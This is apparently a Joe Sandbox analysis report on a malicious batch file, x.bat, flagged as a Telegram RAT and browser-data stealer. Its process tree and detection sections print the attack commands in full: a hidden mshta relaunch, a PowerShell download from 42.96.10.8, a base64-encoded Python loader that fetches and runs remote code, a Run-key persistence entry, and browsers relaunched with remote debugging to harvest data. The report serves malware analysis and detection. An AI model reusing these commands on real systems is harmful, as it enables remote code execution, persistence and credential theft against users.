Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
x.bat

Overview

General Information

Sample name:x.bat
Analysis ID:1555120
MD5:d3e16c25b182396111f5878854aff8af
SHA1:203d0e3ea2b0872accc64829a973647d3fc49a62
SHA256:cc1695a2e481381f8e5d8a5bedc46e3e9c02f5644251a887898036408dc9bcbe
Tags:batuser-maagii
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Sigma detected: Set autostart key via New-ItemProperty Cmdlet
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Telegram RAT
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Powershell creates an autostart link
Powershell drops PE file
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious MSHTA Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Explorer Process Tree Break
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Wscript Shell Run In CommandLine
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 7432 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 7516 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
    • mshta.exe (PID: 7548 cmdline: mshta vbscript:createobject("wscript.shell").run("""C:\Users\user\Desktop\x.bat"" ::",0)(window.close) MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 7600 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" ::" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7756 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • cmd.exe (PID: 7772 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('http://42.96.10.8/envxfix.zip', [System.IO.Path]::GetTempPath() + 'xFSOj9El1Q.zip') " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 7780 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 2484 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $dst = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('LocalApplicationData'), 'xFSOj9El1Q'); Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst } ; [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'xFSOj9El1Q.zip'), $dst) " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 3940 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7440 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "$env:LOCALAPPDATA\xFSOj9El1Q\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 7592 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 4412 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 1720 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7552 cmdline: cmd.exe /c start "" "C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • synaptics.exe (PID: 5232 cmdline: "C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))" MD5: 8AD6C16026FF6C01453D5FA392C14CB4)
            • taskkill.exe (PID: 7868 cmdline: taskkill /F /IM chrome.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 4088 cmdline: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 3320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1980 --field-trial-handle=1952,i,12130508596491223167,1187970668335390785,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • explorer.exe (PID: 8144 cmdline: "C:\Windows\Explorer.EXE" C:\Users\user\AppData\Local\WindowsSecurity.lnk MD5: 662F4F92FDE3557E86D110526BB578D5)
  • explorer.exe (PID: 2364 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 662F4F92FDE3557E86D110526BB578D5)
    • synaptics.exe (PID: 8168 cmdline: "C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))" MD5: 8AD6C16026FF6C01453D5FA392C14CB4)
      • taskkill.exe (PID: 3748 cmdline: taskkill /F /IM chrome.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chrome.exe (PID: 8064 cmdline: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 3696 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2016 --field-trial-handle=1156,i,13827792788180171334,7255104134237789942,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • explorer.exe (PID: 6888 cmdline: "C:\Windows\Explorer.EXE" C:\Users\user\AppData\Local\WindowsSecurity.lnk MD5: 662F4F92FDE3557E86D110526BB578D5)
  • explorer.exe (PID: 3548 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 662F4F92FDE3557E86D110526BB578D5)
    • synaptics.exe (PID: 7804 cmdline: "C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))" MD5: 8AD6C16026FF6C01453D5FA392C14CB4)
      • taskkill.exe (PID: 7808 cmdline: taskkill /F /IM chrome.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chrome.exe (PID: 3396 cmdline: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • taskkill.exe (PID: 6352 cmdline: taskkill /F /IM msedge.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msedge.exe (PID: 7316 cmdline: "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 6952 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2572 --field-trial-handle=2448,i,15289098796550783955,16860821429903123602,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/ConDrvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    SourceRuleDescriptionAuthorStrings
    00000018.00000002.3066959428.00000000038D9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      0000001B.00000003.2786624765.0000000003ACB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        0000001B.00000003.2785465597.0000000003AAB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000018.00000002.3077126094.0000000004870000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            0000001B.00000002.3067343152.0000000003AAB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              Click to see the 2 entries
              SourceRuleDescriptionAuthorStrings
              amsi64_7780.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): Data: Command: mshta vbscript:createobject("wscript.shell").run("""C:\Users\user\Desktop\x.bat"" ::",0)(window.close), CommandLine: mshta vbscript:createobject("wscript.shell").run("""C:\Users\user\Desktop\x.bat"" ::",0)(window.close), CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7432, ParentProcessName: cmd.exe, ProcessCommandLine: mshta vbscript:createobject("wscript.shell").run("""C:\Users\user\Desktop\x.bat"" ::",0)(window.close), ProcessId: 7548, ProcessName: mshta.exe
                Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3940, TargetFilename: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ctypes\macholib\fetch_macholib.bat
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" ::", CommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" ::", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: mshta vbscript:createobject("wscript.shell").run("""C:\Users\user\Desktop\x.bat"" ::",0)(window.close), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7548, ParentProcessName: mshta.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" ::", ProcessId: 7600, ProcessName: cmd.exe
                Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox, CommandLine: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox, CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))", ParentImage: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe, ParentProcessId: 7804, ParentProcessName: synaptics.exe, ProcessCommandLine: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox, ProcessId: 3396, ProcessName: chrome.exe
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1720, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber: Data: Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 752, ProcessCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ProcessId: 2364, ProcessName: explorer.exe
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3940, TargetFilename: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\libcrypto-1_1.dll
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('http://42.96.10.8/envxfix.zip', [System.IO.Path]::GetTempPath() + 'xFSOj9El1Q.zip') ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('http://42.96.10.8/envxfix.zip', [System.IO.Path]::GetTempPath() + 'xFSOj9El1Q.zip') ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" ::", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7600, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('http://42.96.10.8/envxfix.zip', [System.IO.Path]::GetTempPath() + 'xFSOj9El1Q.zip') ", ProcessId: 7772, ProcessName: cmd.exe
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('http://42.96.10.8/envxfix.zip', [System.IO.Path]::GetTempPath() + 'xFSOj9El1Q.zip') ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('http://42.96.10.8/envxfix.zip', [System.IO.Path]::GetTempPath() + 'xFSOj9El1Q.zip') ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" ::", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7600, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('http://42.96.10.8/envxfix.zip', [System.IO.Path]::GetTempPath() + 'xFSOj9El1Q.zip') ", ProcessId: 7772, ProcessName: cmd.exe
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: mshta vbscript:createobject("wscript.shell").run("""C:\Users\user\Desktop\x.bat"" ::",0)(window.close), CommandLine: mshta vbscript:createobject("wscript.shell").run("""C:\Users\user\Desktop\x.bat"" ::",0)(window.close), CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7432, ParentProcessName: cmd.exe, ProcessCommandLine: mshta vbscript:createobject("wscript.shell").run("""C:\Users\user\Desktop\x.bat"" ::",0)(window.close), ProcessId: 7548, ProcessName: mshta.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" ::", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7600, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7780, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" ::", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7600, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force ", ProcessId: 4412, ProcessName: cmd.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-13T13:25:22.146626+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449736TCP
                2024-11-13T13:26:00.388160+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449742TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-13T13:25:25.375630+010028000291Attempted User Privilege Gain42.96.10.880192.168.2.449733TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.7% probability
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF68300 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,??1PyWinBufferView@@QAE@XZ,??1PyWinBufferView@@QAE@XZ,_Py_NoneStruct,_Py_NoneStruct,PyEval_SaveThread,CryptUnprotectData,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,PyBytes_FromStringAndSize,?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_W@Z,Py_BuildValue,LocalFree,LocalFree,LocalFree,?PyWinObject_FreeWCHAR@@YAXPA_W@Z,24_2_6BF68300
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6CFF0 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,PyEval_SaveThread,CryptBinaryToStringW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptBinaryToStringW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_WH@Z,free,??1PyWinBufferView@@QAE@XZ,24_2_6BF6CFF0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6B3F0 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,PyEval_SaveThread,CryptGetMessageSignerCount,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,PyLong_FromLong,??1PyWinBufferView@@QAE@XZ,24_2_6BF6B3F0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6AFE0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QAE@PAU_object@@_N1@Z,PyEval_SaveThread,CryptVerifyMessageSignature,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,??1PyWinBufferView@@QAE@XZ,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,_Py_NoneStruct,Py_BuildValue,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptVerifyMessageSignature,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,free,CertFreeCTLContext,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyBytes_FromStringAndSize,Py_BuildValue,24_2_6BF6AFE0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF647D0 ?PyCryptMsgClose@PyCRYPTMSG@@SAPAU_object@@PAU2@0@Z,CryptMsgClose,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,_Py_NoneStruct,_Py_NoneStruct,24_2_6BF647D0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6BBD0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_NotImplementedError,PyExc_NotImplementedError,PyErr_SetString,malloc,PyExc_NotImplementedError,PyExc_NotImplementedError,PyErr_Format,PyExc_NotImplementedError,PyErr_Format,malloc,PyExc_MemoryError,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptEncodeObjectEx,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,PyBytes_FromStringAndSize,free,LocalFree,24_2_6BF6BBD0
